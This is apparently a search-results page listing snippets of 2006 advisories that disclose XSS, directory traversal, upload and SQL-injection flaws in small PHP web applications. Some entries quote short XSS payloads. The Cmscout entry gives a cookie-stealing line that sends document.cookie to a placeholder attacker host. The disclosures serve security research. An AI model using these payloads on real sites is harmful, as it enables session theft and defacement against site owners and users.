27 matches found
Jupiter CMS <= 1.1.5 - Multiple XSS Attack Vectors
No description provided by source. Jupiter CMS = 1.1.5 multiple XSS attack vectors. Discovered by: Nomenumbra/0x4F4C Date: 3/11/2006 impact:high privilege escalation,site defacement Jupiter CMS http://www.highstrike.net/ is a dynamic CMS system like mambo or limbo, allowing users to subscribe and...
[SA20285] Assetman Unspecified Script Insertion Vulnerabilities
TITLE: Assetman Unspecified Script Insertion Vulnerabilities SECUNIA ADVISORY ID: SA20285 VERIFY ADVISORY: http://secunia.com/advisories/20285/ CRITICAL: Less critical IMPACT: Cross Site Scripting WHERE: From remote SOFTWARE: Assetman 2.x http://secunia.com/product/10187/ DESCRIPTION: Nomenumbra...
ByteHoard <= 2.1 multiple vulnerabilities
ByteHoard = 2.1 multiple vulnerabilities Discovered by: Nomenumbra Date: 23/5/2006 impact:high file manipulation,privilege escalation,possible defacement ByteHoard versions up to 2.1 are prone to multiple vulnerabilities, including directory traversal. 0x00 Directory traversal: Users are able to...
PHP AGTC-Membership system <= v1.1a XSS
PHP AGTC-Membership system = v1.1a XSS Discovered by: Nomenumbra Date: 23/5/2006 impact:moderate privilege escalation,possible defacement Ordinary users can add users to the user management system as well, or change their own email address, which isn't properly sanitized, thus allowing XSS as...
Assetman <= 2.4a XSS
Assetman = 2.4a XSS Discovered by: Nomenumbra Date: 23/5/2006 impact:moderate privilege escalation,possible defacement Assetman doesn't filter any of it's input, allowing users to inject arbitrary HTML or javascript code. Nomenumbra...
DSChat <= 1.0 XSS
DSChat = 1.0 XSS Discovered by: Nomenumbra Date: 21/5/2006 impact:moderate possible defacement DSChat is a PHP-based chatscript which does no filtering against XSS whatsoever, thus allowing anyone to insert html or javascript in the chatbox. Nomenumbra...
SkyeShoutbox <= v.1.2.0 XSS
SkyeShoutbox = v.1.2.0 XSS Discovered by: Nomenumbra Date: 21/5/2006 impact:moderate possible defacement SkyeShoutbox doesn't filter any input at all, thus allowing attackers to inject arbitrary html or javascript. Nomenumbra...
Russcom PHPImages lack of validation
Russcom PHPImages lack of validation Discovered by: Nomenumbra Date: 21/5/2006 impact:moderate Russcom's PHPImages doesn't validate if the uploaded file is an image, it just checks for the extension, thus allowing an attacker to upload php scripts with a .gif extension for example, potentially...
Chatty improper input sanitizing
Chatty improper input sanitizing Discovered by: Nomenumbra Date: 21/5/2006 impact:moderate possible defacement Chatty is a PHP-based chatscript allowing users to chat over the web. Subscribing with a username like this: scriptalert22xss22/script would cause major xss in the chatroom. Nomenumbra...
QBv14 XSS
QBv14 XSS Discovered by: Nomenumbra Date: 21/5/2006 impact:moderate possible defacement QBv14 doesn't filter anything at all, in short: XSS heaven..... Nomenumbra...
[SA20081] Website Baker "display_name" Script Insertion Vulnerability
TITLE: Website Baker "displayname" Script Insertion Vulnerability SECUNIA ADVISORY ID: SA20081 VERIFY ADVISORY: http://secunia.com/advisories/20081/ CRITICAL: Less critical IMPACT: Cross Site Scripting WHERE: From remote SOFTWARE: Website Baker 2.x http://secunia.com/product/5455/ DESCRIPTION:...
ChipmunkBlogger improper input sanitizing
ChipmunkBlogger improper input sanitizing Discovered by: Nomenumbra Date: 6/4/2006 impact:moderate privilege escalation,possible defacement Posts potentially made by lower-privilege members and profile names aren't properly sanitized, thus resulting in being vulnerable to the following kind of XS...
myBloggie <= 2.1.3 XSS
myBloggie = 2.1.3 XSS Discovered by: Nomenumbra Date: 6/4/2006 impact:moderate privilege escalation,possible defacement MyBloggie versions 2.1.3 and below are vulnerable to XSS injection in the image BBcode as follows: imgjavascript:alert'xss'/img Nomenumbra/0x4F4C...
WebsiteBaker CMS lack of sanitizing
WebsiteBaker CMS lack of sanitizing Discovered by: Nomenumbra Date: 6/4/2006 impact:moderate privilege escalation,possible defacement A user's display name isn't filtered at all, allowing them to insert any HTML of javascript code at will. Nomenumbra/0x4F4C...
PassMasterFlex (and PassMasterFlex+) XSS injection
PassMasterFlex and PassMasterFlex+ XSS injection Discovered by: Nomenumbra Date: 5/4/2006 impact:moderate privilege escalation,possible defacement PassMasterFlex+ is a database-driven multiple login that utilizes cookies for authentication. PassMasterFlex+ was written not only to provide an...
VisionSource CMS <= 0.6 XSS vectors
VisionSource CMS = 0.6 XSS vectors Discovered by: Nomenumbra Date: 5/4/2006 impact:moderate privilege escalation,possible defacement No data inside the user's profile is filtered thus allowing them to embed malicious XSS vectors to potentially steal cookies. Nomenumbra/0x4F4C...
X7Chat <= 2.0.2 avatar XSS injection
X7Chat = 2.0.2 avatar XSS injection Discovered by: Nomenumbra Date: 6/4/2006 impact:moderate privilege escalation,possible defacement X7Chat versions 2.0.2 and below are prone to XSS injection in a user's avatar. By setting this as the url of your avatar: javascript:alert'xss' you'd have some goo...
ChipmunkBoard Multiple Attack vectors
ChipmunkBoard Multiple Attack vectors Discovered by: Nomenumbra Date: 6/4/2006 impact:high privilege escalation,possible defacement It is possible to insert the following javascript in the BBcode or supply it as your avatar url: javascript:alert27xss27; Also ChipmunkBoard is prone to SQL-injectio...
tyrocmsXSS.txt
TyroCms beta V1.0 multiple XSS injections Discovered by: Nomenumbra Date: 5/2/2006 impact:moderate privilege escalation,possible defacement TyroCMS is a PHP & MySql powered content management systemcms. Inludes built-in forums, powerful admin control panel, secure user system, and much more. Easi...
CmscoutXSS.txt
Cmscout window.navigate'http://www.evilhost.com/cookiestealer.php?c='+document.cookie we could obtain the admin's cookie. The inside of BBcode isn't filtered either. This goes for the forums too. Nomenumbra/0x4F4C...